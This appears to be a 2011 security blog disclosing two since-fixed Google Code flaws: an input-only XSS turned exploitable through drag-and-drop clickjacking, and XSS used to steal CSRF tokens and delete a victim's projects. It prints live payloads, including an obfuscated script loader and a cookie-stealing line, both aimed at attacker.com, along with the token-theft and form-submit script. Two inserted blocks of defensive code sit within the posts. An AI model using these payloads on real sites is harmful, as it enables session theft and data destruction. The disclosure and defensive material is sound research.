<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-KWtmlDDzyio/TeM0ofDXeRI/AAAAAAAAASI/p2Gqs0g05Ko/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://3.bp.blogspot.com/-KWtmlDDzyio/TeM0ofDXeRI/AAAAAAAAASI/p2Gqs0g05Ko/s320/poc2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The last piece of garbage carries the XSS payload in its ‘data-payload’ attribute, and an invisible iframe whose source is the vulnerable page follows it until the object is dropped. The payload used for this PoC is: <span style="background-color: #999999;"><img src=1 onerror='alert(document.domain)'></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kfU8Xrs7WOk/TeM0r-0tdmI/AAAAAAAAASM/o--mJ2c9TpE/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-kfU8Xrs7WOk/TeM0r-0tdmI/AAAAAAAAASM/o--mJ2c9TpE/s320/poc3.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
As soon as the object is dropped, a link to publish the score is shown; it sits directly on top of the ‘Go’ button of the vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-bauiSki-Q_Y/TeM0vBfEVzI/AAAAAAAAASQ/FJqmYFYU-b4/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="http://1.bp.blogspot.com/-bauiSki-Q_Y/TeM0vBfEVzI/AAAAAAAAASQ/FJqmYFYU-b4/s320/poc4.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
When the victim clicks the ‘Score’ button/link, the XSS payload executes and pops up an alert box saying ‘code.google.com’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-GI-nSqjmJqw/TeM0yKFyDFI/AAAAAAAAASU/eM4A6-meSaE/s1600/poc5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-GI-nSqjmJqw/TeM0yKFyDFI/AAAAAAAAASU/eM4A6-meSaE/s320/poc5.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<b>Attack: CSRF Protection bypass to delete Google Code Projects with XSS</b><br />
<br />
We know that CSRF protections can be bypassed with XSS: script running in the application’s origin can read the anti-CSRF token and submit it. Google has implemented token-based CSRF protection for most critical actions. One of them is the deletion of a hosted project in Google Code Project Hosting. Users are allowed to host their projects under the code.google.com domain. The advanced options page of every project has a ‘Delete Project’ form, and it is protected by a token.<br />
<br />
Now, to conduct this attack successfully, an attacker must know the following:<br />
1. Project Name<br />
2. Valid token<br />
<br />
With the above information, an attacker can craft a POST request to the following page to delete the project:<br />
<br />
http://code.google.com/p/<project_name>/adminAdvanced.do <br />
<br />
with the POST body token=<valid_token>&deletebtn=Delete+project<br />
<br />
<br />
This only works against a specific user with a known project name. To make it generic for all Google Code users, I followed this process:<br />
1. Identify the user’s link by requesting <a href="http://code.google.com/">http://code.google.com</a> and extracting the ‘projects-dropdown’ element. The result is a link like <a href="http://code.google.com/u/amolnaik4">http://code.google.com/u/amolnaik4</a><br />
2. Request the link found in step 1 and extract the ‘owner’ element. This element holds an <a href=<project_link>> tag for every project under the user.<br />
3. Request the project link and extract the token.<br />
4. Create a form that POSTs to <project_link>/adminAdvanced.do with the token and the button value, and submit the form.<br />
<br />
This way it is generic for every user who visits the attacker’s site. When exploiting this, the paper written by <a href="http://www.exploit-db.com/download_pdf/13534">Nytro</a> comes in handy.<br />
The following is the JavaScript file the attacker hosts on his/her server along with the Drag-and-Drop game.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mVYF0hXephw/TeM02W1lR3I/AAAAAAAAASY/LDqUs8Zn5HE/s1600/js-file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://2.bp.blogspot.com/-mVYF0hXephw/TeM02W1lR3I/AAAAAAAAASY/LDqUs8Zn5HE/s320/js-file.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
Let’s see how it works:<br />
Currently the victim has 2 projects in his Google Code account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IWE5qKFyjdE/TeM09aD4jzI/AAAAAAAAASc/FgX-JXfClBk/s1600/attack1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="http://2.bp.blogspot.com/-IWE5qKFyjdE/TeM09aD4jzI/AAAAAAAAASc/FgX-JXfClBk/s320/attack1.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The attacker includes the malicious JavaScript file via the XSS payload in the HTML5 Drag-and-Drop game. The payload looks like this: <span style="background-color: #999999;"><img src=1 onerror='document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));'></span><br />
The decoded payload is: <span style="background-color: #999999;">document.write('<script src="http://attacker.com/code.js"></script>');</span><br />
<br />
When the last item in the game is dragged to the dustbin, the above payload is placed into the input field of the vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dBVYtqNOgIo/TeM1Ac64XwI/AAAAAAAAASg/YII66nZBnpA/s1600/attack2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://3.bp.blogspot.com/-dBVYtqNOgIo/TeM1Ac64XwI/AAAAAAAAASg/YII66nZBnpA/s320/attack2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
When the victim clicks the ‘Score’ link, the payload starts executing. The first step is to identify the user link. The first iframe requests <a href="http://code.google.com/">http://code.google.com</a>, and the user link is read with <span style="background-color: #999999;">document.getElementById("iframe").contentDocument.getElementById("projects-dropdown");</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--gjCrYU45a8/TeMvGgcVN3I/AAAAAAAAARY/RDqpqRIixig/s1600/source-userlink.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://2.bp.blogspot.com/--gjCrYU45a8/TeMvGgcVN3I/AAAAAAAAARY/RDqpqRIixig/s320/source-userlink.JPG" width="320" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-kjyGaKNBhNU/TeM1F8pHA8I/AAAAAAAAASk/X1Xja9AblZg/s1600/attack3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-kjyGaKNBhNU/TeM1F8pHA8I/AAAAAAAAASk/X1Xja9AblZg/s320/attack3.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
Now the exploit requests the above user link (<a href="http://code.google.com/u/amolnaik4">http://code.google.com/u/amolnaik4</a>) for the project listing and picks up the first project link.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5PGtsq2Qi04/TeMvdNatNWI/AAAAAAAAARg/lYqh-SyAelE/s1600/source-projects.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://2.bp.blogspot.com/-5PGtsq2Qi04/TeMvdNatNWI/AAAAAAAAARg/lYqh-SyAelE/s320/source-projects.JPG" width="320" /></a></div><br />
To get the first project link, I used <span style="background-color: #999999;">document.getElementById("iframe1").contentDocument.getElementsByName("owner")[0].getElementsByTagName("a")[0].href;</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-f2qWRCkyJak/TeM1Ka98S_I/AAAAAAAAASo/I0cVePOjxb8/s1600/attack4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-f2qWRCkyJak/TeM1Ka98S_I/AAAAAAAAASo/I0cVePOjxb8/s320/attack4.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
The next step is to get the token. The next iframe requests <a href="http://code.google.com/p/mutest/adminAdvanced">http://code.google.com/p/mutest/adminAdvanced</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3SYbvcg_h_4/TeMv3bm506I/AAAAAAAAARo/kXemB_KWVRQ/s1600/source-admin.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://1.bp.blogspot.com/-3SYbvcg_h_4/TeMv3bm506I/AAAAAAAAARo/kXemB_KWVRQ/s320/source-admin.JPG" width="320" /></a></div><br />
The token is extracted with <span style="background-color: #999999;">document.getElementById("iframe2").contentDocument.forms[1].token.value;</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WwnMCNXlQ6k/TeM1OIA2JDI/AAAAAAAAASs/TYoQRv62sv0/s1600/attack5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://1.bp.blogspot.com/-WwnMCNXlQ6k/TeM1OIA2JDI/AAAAAAAAASs/TYoQRv62sv0/s320/attack5.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
Now simply craft a POST form and submit it. The following lines do this:<br />
<br />
<span style="background-color: #999999;">document.writeln('<form width="0" height="0" method="POST" action="'+x+'adminAdvanced.do">'); document.writeln('<input type="hidden" name="token" value="' + token + '" />'); document.writeln('<input type="hidden" name="deletebtn" value="Delete+project" />'); document.writeln('</form>'); document.forms[0].submit();</span><br />
<br />
where x is the project link (http://code.google.com/p/mutest/)<br />
<br />
Done!! The first project is scheduled for deletion.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tM3pVSIWXJI/TeM1VlmX8gI/AAAAAAAAASw/cYYNUINDvdk/s1600/attack6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/-tM3pVSIWXJI/TeM1VlmX8gI/AAAAAAAAASw/cYYNUINDvdk/s320/attack6.JPG" width="320" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AyggIoPC5wk/TeM1YVp9H2I/AAAAAAAAAS0/ZTroS8HtoFI/s1600/attack7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://1.bp.blogspot.com/-AyggIoPC5wk/TeM1YVp9H2I/AAAAAAAAAS0/ZTroS8HtoFI/s320/attack7.JPG" width="320" /></a></div><br />
The attacker can iterate through all the projects under the victim’s account and schedule each one for deletion.<br />
<br />
TimeLine:<br />
<br />
Bug discovered: 11th April 2011<br />
Reported to Google: 13th April 2011<br />
Bug fixed by Google: 25th April 2011<br />
Public Disclosure: 30th April 2011<br />
<br />
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com1tag:blogger.com,1999:blog-1544325078740292092.post-45710477005052248012011-03-22T00:12:00.000-07:002011-03-22T07:50:19.944-07:00Exploitation of “Self-Only” Cross-Site Scripting in Google Code<div dir="ltr" style="text-align: left;" trbidi="on">As an attempt to contribute to <a href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html">Google’s Rewarding Web Application Security Research</a>, I started looking at Google Code in search of vulnerabilities that could qualify for the reward program. That is where I came across a cross-site scripting bug which seemed “not exploitable” at first. As Google has patched the vulnerable pages, I’m going to explain the exploitation of this bug here.<br />
<br />
<br />
<span style="font-size: large;"><b>“Self-Only” Cross-Site Scripting</b></span><br />
<br />
The term <b>“Self-Only” XSS</b> has been used in the past by several researchers for “<b>CSRF Protected XSS</b>”. You can read about it <a href="http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html">here</a> and <a href="http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/">here</a>. The issue I found on the Google Code site was not a “CSRF protected XSS”. I call this bug “Self-Only” XSS because of its nature: it was neither a GET nor a POST XSS, and only the victim could trigger it. This means the victim has to type “<span style="background-color: #cccccc;"><script>alert(document.cookie)</script></span>” into the input box and click “Go!” to get his own cookies. Confused? OK, I’ll try to explain this with the Google Code example.<br />
<br />
<br />
<span style="font-size: large;"><b>Cross-Site Scripting in Google Code</b></span><br />
<br />
Google Code hosts the documentation for the Google APIs. The Google Maps API documentation includes example pages that demonstrate different map functions. One of them is the “Simple Geocoding” example. The link for this page is:<br />
<br />
<div style="background-color: #cccccc;"><a href="http://code.google.com/intl/es-MX/apis/maps/documentation/javascript/v2/examples/geocoding-simple.html">http://code.google.com/intl/es-MX/apis/maps/documentation/javascript/v2/examples/geocoding-simple.html</a></div><br />
This page displays the geo-location of the requested place on the map. The page makes a GET request to the Google Maps API and displays the result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh5.googleusercontent.com/-VI-sJivVszE/TYhEpByokGI/AAAAAAAAAOs/gTolStxIoAE/s1600/main-page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://lh5.googleusercontent.com/-VI-sJivVszE/TYhEpByokGI/AAAAAAAAAOs/gTolStxIoAE/s400/main-page.JPG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><br />
When requested with a valid location followed by an XSS payload, e.g. <span style="background-color: #cccccc;">pune<script>alert(document.cookie)</script></span>, the page makes the following GET request to the Google Maps API:<br />
<br />
<div style="background-color: #cccccc;">http://map.google.com/maps/geo?output=json&oe=utf-8&q=pune%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&key=ABQIAAAAzr2EBOXUKnm_jVnk0OJI7xSosDVG8KKPE1-m51RBrvYughuyMxQ-i1QfUnH94QxWIa6N4U6MouMmBA&mapclient=jsapi&hl=en&callback=</div><br />
The Google Maps API returns a JSON response to the request as below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-FZki8lRfM-s/TYhF8xeiDNI/AAAAAAAAAO0/34283q6Mxj4/s1600/json-request.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://lh6.googleusercontent.com/-FZki8lRfM-s/TYhF8xeiDNI/AAAAAAAAAO0/34283q6Mxj4/s400/json-request.JPG" width="400" /></a></div><br />
This response is rendered by the example page at Google Code as below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh4.googleusercontent.com/-YZreh7BbGR4/TYhGahp1H3I/AAAAAAAAAO4/JeSNJpx4UeU/s1600/dom-source.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://lh4.googleusercontent.com/-YZreh7BbGR4/TYhGahp1H3I/AAAAAAAAAO4/JeSNJpx4UeU/s400/dom-source.JPG" width="400" /></a></div><br />
The page then executes the payload in the victim’s browser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-8TIJWx8VjlQ/TYhHQaJENOI/AAAAAAAAAO8/fzVAk-JTBA8/s1600/xss-poc.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://lh6.googleusercontent.com/-8TIJWx8VjlQ/TYhHQaJENOI/AAAAAAAAAO8/fzVAk-JTBA8/s400/xss-poc.JPG" width="400" /></a></div><br />
This happens because the data from the response is not sanitized when it is rendered back into the example page.<br />
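Both example pages on this blog had the same root cause: text under the user’s control (the status message on the Books search page in the CSRF post, and here the fields of the JSON reply that echo the query) was written into the page as HTML. The following is an added example, not code from either page or from Google, that puts the unsafe rendering beside an output-encoded version. The message layout, the escapeHtml helper and the shape of the sample JSON reply are assumptions made for this example.

```javascript
// Added example, not code from the Google Code pages: the rendering bug the
// two posts describe (user-controlled text concatenated into HTML) beside the
// output-encoded version. Message layout and the sample JSON shape are
// assumptions for the example.

// HTML-encode text that will be placed in an element body or inside a
// double-quoted attribute. Covers the five characters that can change
// HTML structure or terminate an attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// VULNERABLE: the Books search page pattern. The query is concatenated into
// markup, so "<img src=1 onerror=...>" in the query becomes a live element.
function renderMessageUnsafe(query) {
  return '<div id="message">Showing results for: ' + query + '</div>';
}

// HARDENED: same message, query encoded first. The browser now shows the
// literal text "<img ...>" and runs nothing.
function renderMessageSafe(query) {
  return '<div id="message">Showing results for: ' + escapeHtml(query) + '</div>';
}

// The geocoding page rendered fields of the API's JSON reply. The reply echoes
// the query (the "name" field), so every string in it is attacker-influenced
// and must be encoded the same way. The reply shape used here is a constructed
// stand-in, not a captured API response.
function renderGeocodeResultSafe(reply) {
  const placemark = Array.isArray(reply.Placemark) ? reply.Placemark[0] : null;
  const address = placemark && typeof placemark.address === 'string' ? placemark.address : '';
  return '<div id="result"><b>' + escapeHtml(reply.name) + '</b>: ' + escapeHtml(address) + '</div>';
}

// Check used to verify the output below: does the rendered HTML still contain
// a real start tag of the given name? A detector for the example, not a sanitizer.
function containsStartTag(html, tagName) {
  return new RegExp('<' + tagName + '(\\s|>|/)', 'i').test(html);
}

// In a browser the same fix is achieved by writing untrusted text through
// element.textContent (or a text node) instead of innerHTML or document.write.
```

Encoding at the point of output is the fix for both pages; validating the query on the way in would not have helped, because the API reply is just as untrusted as the query that produced it.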
<br />
A quick analysis of the request/response shows that this XSS cannot be exploited by the classical GET or POST method. As an attacker, we do not control any request that could carry the payload and, when sent to the victim, execute in his/her browser. For a successful attack, the victim would have to type the XSS payload into the vulnerable input box and click the “Go!” button. That is what I referred to as <b>“Self-Only” XSS</b>.<br />
<br />
<span style="font-size: large;"><b>Exploitation</b></span><br />
<br />
During a discussion with <a href="http://twitter.com/lavakumark">Lavakumar</a>, he suggested checking for possible clickjacking combined with an HTML5 Drag and Drop exploit.<br />
<br />
The target page was vulnerable to clickjacking (it could be loaded in a frame by another site), and after spending a few hours I was able to craft a working PoC for this attack. Here are the scenario and details:<br />
<br />
An attacker hosts a Drag and Drop game which convinces the victim to perform drag and drop operations. The game page renders the vulnerable Google Code page in an invisible iframe. It also has an element like this:<br />
<br />
<div style="background-color: #cccccc;"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')"><h3>DRAG ME!!</h3></div></div><br />
When the victim starts dragging this, the event’s data value is set to ‘Evil Data’. The victim drops the element onto a text field inside the invisible iframe, which populates it with ‘Evil Data’. The victim then clicks a dummy button that is placed over the “Go!” button of the vulnerable page.<br />
<br />
This is how the PoC looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh6.googleusercontent.com/-T5PfdVTYoAk/TYhJDxdKG1I/AAAAAAAAAPA/7-usSY43V60/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://lh6.googleusercontent.com/-T5PfdVTYoAk/TYhJDxdKG1I/AAAAAAAAAPA/7-usSY43V60/s400/poc1.JPG" width="400" /></a></div><br />
The victim drags the text to input field which holds the XSS payload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-v45mRsJGgi0/TYhJVxsD_KI/AAAAAAAAAPE/pfRkU_vZka4/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="https://lh3.googleusercontent.com/-v45mRsJGgi0/TYhJVxsD_KI/AAAAAAAAAPE/pfRkU_vZka4/s400/poc2.JPG" width="400" /></a></div><br />
Then he/she clicks on the “Go!!” button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://lh5.googleusercontent.com/-GunomnWCSgE/TYhJkVw3QCI/AAAAAAAAAPI/4NXiB3M15-M/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://lh5.googleusercontent.com/-GunomnWCSgE/TYhJkVw3QCI/AAAAAAAAAPI/4NXiB3M15-M/s400/poc3.JPG" width="400" /></a></div>Bingo!!<br />
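Both Drag and Drop PoCs on this blog (this one and the one in the CSRF post) depend on one precondition: the vulnerable page let itself be loaded in an invisible iframe on the attacker’s site. The following is an added example, not code from the posts or from Google, of the response-header check a scanner or a deployment test would run to flag that. It reads X-Frame-Options and the CSP frame-ancestors directive and decides whether a given origin may frame the page. The sample header sets, the origins and the simplified source-expression matcher are assumptions made for this example.

```javascript
// Added example, not from the posts: decide from response headers whether a
// page can be framed by a given origin, the precondition for the Drag and Drop
// clickjacking PoCs. Sample responses and origins are constructed; the
// source-expression matcher is simplified (no ports, no paths).

// Extract the frame-ancestors source list from a CSP header value, or null
// when the directive is absent.
function frameAncestors(cspValue) {
  if (typeof cspValue !== 'string') return null;
  for (const directive of cspValue.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') {
      return parts.slice(1).map((s) => s.toLowerCase());
    }
  }
  return null;
}

// Does a CSP host/scheme source such as https://*.example.com, example.com or
// https: match the framing origin? Simplified matcher for the example.
function matchesSource(source, origin) {
  const url = new URL(origin);
  const scheme = url.protocol.slice(0, -1); // 'https:' -> 'https'
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return source.slice(0, -1) === scheme;
  let host = source;
  const withScheme = source.match(/^([a-z][a-z0-9+.-]*):\/\/(.+)$/);
  if (withScheme) {
    if (withScheme[1] !== scheme) return false;
    host = withScheme[2];
  }
  host = host.split('/')[0].split(':')[0]; // drop path and port
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.hostname === host;
}

// true when framerOrigin is allowed to embed the page served with `headers`.
// CSP frame-ancestors takes precedence over X-Frame-Options; a page with
// neither is framable by anyone, which is the state the PoCs relied on.
function framableBy(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors !== null) {
    if (ancestors.includes("'none'")) return false;
    if (ancestors.includes('*')) return true;
    return ancestors.some((src) => (src === "'self'"
      ? framerOrigin === pageOrigin
      : matchesSource(src, framerOrigin)));
  }

  const xfo = String(h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  return true; // no (or unrecognised) framing protection
}

// Audit helper: URLs among `responses` that `framerOrigin` could frame.
function findFramable(responses, framerOrigin) {
  return responses
    .filter((r) => framableBy(r.headers, framerOrigin, r.origin))
    .map((r) => r.url);
}

// Constructed sample, not captured traffic: the Books example page as the
// CSRF post found it (no protection) next to two hardened variants.
const SAMPLE_RESPONSES = [
  { url: 'http://code.google.com/apis/books/docs/viewer/examples/book-dataapi-titlesearch.html',
    origin: 'http://code.google.com', headers: { 'Content-Type': 'text/html' } },
  { url: 'https://code.google.com/hardened-xfo', origin: 'https://code.google.com',
    headers: { 'X-Frame-Options': 'DENY' } },
  { url: 'https://code.google.com/hardened-csp', origin: 'https://code.google.com',
    headers: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.google.com" } },
];
```

Run findFramable(SAMPLE_RESPONSES, 'https://attacker.example') and only the unprotected example page comes back. Note that the drop target did not have to be visible for the PoC to work, so the check is on the headers of the framed page, not on anything the user could see.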
<br />
<br />
<span style="font-size: large;"><b>The Attack – Cookie Stealing</b></span><br />
<br />
By changing the ‘Evil Data’ in the Drag and Drop element to a script that sends the cookie to the attacker’s cookie-grabbing endpoint, a successful cookie-stealing attack can be performed.<br />
<br />
<div style="background-color: #cccccc;"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '<script>document.location=\'http://attacker.com/google/grab.php?cookie=\'+document.cookie</script>')"><h3>DRAG ME!!</h3></div></div><br />
<br />
<span style="font-size: large;"><b>The Reward</b></span><br />
<br />
Google security team has appreciated my efforts and put me on the <a href="http://www.google.com/corporate/halloffame.html">Google Security Hall of Fame</a>.<br />
<br />
Special thanks to <a href="http://twitter.com/lavakumark">Lavakumar</a>!!<br />
<br />
<a href="http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html" target="_blank">kkotowicz</a> has explained the same issue really well.<br />
<br />
<span style="font-size: large;"><b>Timeline</b></span><br />
<br />
<b>Bug discovered:</b> 15th Feb 2011<br />
<b>Bug Reported to vendor:</b> 21st Feb 2011<br />
<b>Public Disclosure:</b> 21st Mar 2011<br />
<br />
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-61348825591703679332011-03-21T23:28:00.000-07:002011-03-21T23:28:28.310-07:00First Post<div dir="ltr" style="text-align: left;" trbidi="on">This is the time to create a blog and start blogging. So here is my blog.<br />
I'll be discussing my thoughts and work in security here.<br />
<br />
Happy blogging...!!!</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com0